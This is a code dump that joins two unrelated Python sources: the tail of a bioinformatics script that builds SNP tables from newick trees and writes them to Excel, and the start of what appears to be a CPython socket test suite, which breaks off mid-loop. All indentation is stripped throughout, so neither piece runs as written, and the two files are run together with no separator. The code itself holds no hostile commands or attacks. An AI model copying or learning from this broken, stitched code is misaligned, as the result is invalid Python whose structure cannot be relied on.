# Inputs are single files, not collections,
# so input file names are not useful for naming
# output files.
group_str = None
else:
group_str = group
count = 0
chunk_start = 0
chunk_end = 0
column_count = df.shape[1]
if column_count >= MAXCOLS:
# Here the number of columns is greater than
# the maximum allowed by Excel, so multiple
# outputs will be produced.
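# For example (hypothetical numbers), a 2,500-column table is written
# as three files of 1024, 1024 and 452 columns.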
while column_count >= MAXCOLS:
count += 1
chunk_end += MAXCOLS
df_of_type = df.iloc[:, chunk_start:chunk_end]
output_excel(df_of_type, type_str, group_str, annotation_dict, count=count)
chunk_start += MAXCOLS
column_count -= MAXCOLS
count += 1
df_of_type = df.iloc[:, chunk_start:]
output_excel(df_of_type, type_str, group_str, annotation_dict, count=count)
else:
output_excel(df, type_str, group_str, annotation_dict)
def preprocess_tables(task_queue, annotation_dict, timeout):
while True:
try:
tup = task_queue.get(block=True, timeout=timeout)
except queue.Empty:
break
newick_file, json_file, json_avg_mq_file = tup
avg_mq_series = pandas.read_json(json_avg_mq_file, typ='series', orient='split')
# Map quality to dataframe.
mqdf = avg_mq_series.to_frame(name='MQ')
mqdf = mqdf.T
# Get the group.
group = get_sample_name(newick_file)
snps_df = pandas.read_json(json_file, orient='split')
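# Recover the sample order from the newick tree: replace ':' and ',' with
# newlines, strip parentheses and branch-length values, drop 'root', then
# re-insert 'root' at the top so it leads the table.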
with open(newick_file, 'r') as fh:
for line in fh:
line = re.sub('[:,]', '\n', line)
line = re.sub('[)(]', '', line)
line = re.sub(r'[0-9].*\.[0-9].*\n', '', line)
line = re.sub('root\n', '', line)
sample_order = line.split('\n')
sample_order = list([_f for _f in sample_order if _f])
sample_order.insert(0, 'root')
tree_order = snps_df.loc[sample_order]
# Count number of SNPs in each column.
snp_per_column = []
for column_header in tree_order:
count = 0
column = tree_order[column_header]
for element in column:
if element != column[0]:
count = count + 1
snp_per_column.append(count)
row1 = pandas.Series(snp_per_column, tree_order.columns, name="snp_per_column")
# Count number of SNPS from the
# top of each column in the table.
snp_from_top = []
for column_header in tree_order:
count = 0
column = tree_order[column_header]
# for each element in the column
# skip the first element
for element in column[1:]:
if element == column[0]:
count = count + 1
else:
break
snp_from_top.append(count)
row2 = pandas.Series(snp_from_top, tree_order.columns, name="snp_from_top")
tree_order = tree_order.append([row1])
tree_order = tree_order.append([row2])
# In pandas=0.18.1 even this does not work:
# abc = row1.to_frame()
# abc = abc.T --> tree_order.shape (5, 18), abc.shape (1, 18)
# tree_order.append(abc)
# Continue to get error: "*** ValueError: all the input arrays must have same number of dimensions"
tree_order = tree_order.T
tree_order = tree_order.sort_values(['snp_from_top', 'snp_per_column'], ascending=[True, False])
tree_order = tree_order.T
# Remove snp_per_column and snp_from_top rows.
cascade_order = tree_order[:-2]
# Output the cascade table.
output_cascade_table(cascade_order, mqdf, group, annotation_dict)
# Output the sorted table.
output_sort_table(cascade_order, mqdf, group, annotation_dict)
task_queue.task_done()
def set_num_cpus(num_files, processes):
num_cpus = int(multiprocessing.cpu_count())
if num_files < num_cpus and num_files < processes:
return num_files
if num_cpus < processes:
half_cpus = int(num_cpus / 2)
if num_files < half_cpus:
return num_files
return half_cpus
return processes
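# Illustrative behaviour (hypothetical values): with 8 detected CPUs,
# set_num_cpus(3, 8) returns 3 (fewer files than CPUs or processes) and
# set_num_cpus(20, 16) returns 4 (half of the detected CPUs).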
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--input_avg_mq_json', action='store', dest='input_avg_mq_json', required=False, default=None, help='Average MQ json file')
parser.add_argument('--input_newick', action='store', dest='input_newick', required=False, default=None, help='Newick file')
parser.add_argument('--input_snps_json', action='store', dest='input_snps_json', required=False, default=None, help='SNPs json file')
parser.add_argument('--gbk_file', action='store', dest='gbk_file', required=False, default=None, help='Optional gbk file')
parser.add_argument('--processes', action='store', dest='processes', type=int, help='User-selected number of processes to use for job splitting')
args = parser.parse_args()
if args.gbk_file is not None:
# Create the annotation_dict for annotating
# the Excel tables.
annotation_dict = get_annotation_dict(args.gbk_file)
else:
annotation_dict = None
# The assumption here is that the list of files
# in both INPUT_NEWICK_DIR and INPUT_JSON_DIR are
# named such that they are properly matched if
# the directories contain more than 1 file (i.e.,
# hopefully the newick file names and json file names
# will be something like Mbovis-01D6_* so they can be
# sorted and properly associated with each other).
if args.input_newick is not None:
newick_files = [args.input_newick]
else:
newick_files = []
for file_name in sorted(os.listdir(INPUT_NEWICK_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_NEWICK_DIR, file_name))
newick_files.append(file_path)
if args.input_snps_json is not None:
json_files = [args.input_snps_json]
else:
json_files = []
for file_name in sorted(os.listdir(INPUT_JSON_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_JSON_DIR, file_name))
json_files.append(file_path)
if args.input_avg_mq_json is not None:
json_avg_mq_files = [args.input_avg_mq_json]
else:
json_avg_mq_files = []
for file_name in sorted(os.listdir(INPUT_JSON_AVG_MQ_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_JSON_AVG_MQ_DIR, file_name))
json_avg_mq_files.append(file_path)
multiprocessing.set_start_method('spawn')
queue1 = multiprocessing.JoinableQueue()
queue2 = multiprocessing.JoinableQueue()
num_files = len(newick_files)
cpus = set_num_cpus(num_files, args.processes)
# Set a timeout for get()s in the queue.
timeout = 0.05
for i, newick_file in enumerate(newick_files):
json_file = json_files[i]
json_avg_mq_file = json_avg_mq_files[i]
queue1.put((newick_file, json_file, json_avg_mq_file))
# Complete the preprocess_tables task.
processes = [multiprocessing.Process(target=preprocess_tables, args=(queue1, annotation_dict, timeout, )) for _ in range(cpus)]
for p in processes:
p.start()
for p in processes:
p.join()
queue1.join()
if queue1.empty():
queue1.close()
queue1.join_thread()
test_socket.py
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _is_fd_in_blocking_mode(sock):
return not bool(
fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
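# Illustrative only (not part of the original test): a classic CAN frame in
# this format could be packed as
# struct.pack(can_frame_fmt, 0x123, 3, b'\x01\x02\x03'.ljust(8, b'\x00'))
# i.e. CAN id, data length code, then the 8-byte data field padded with NULs.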
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
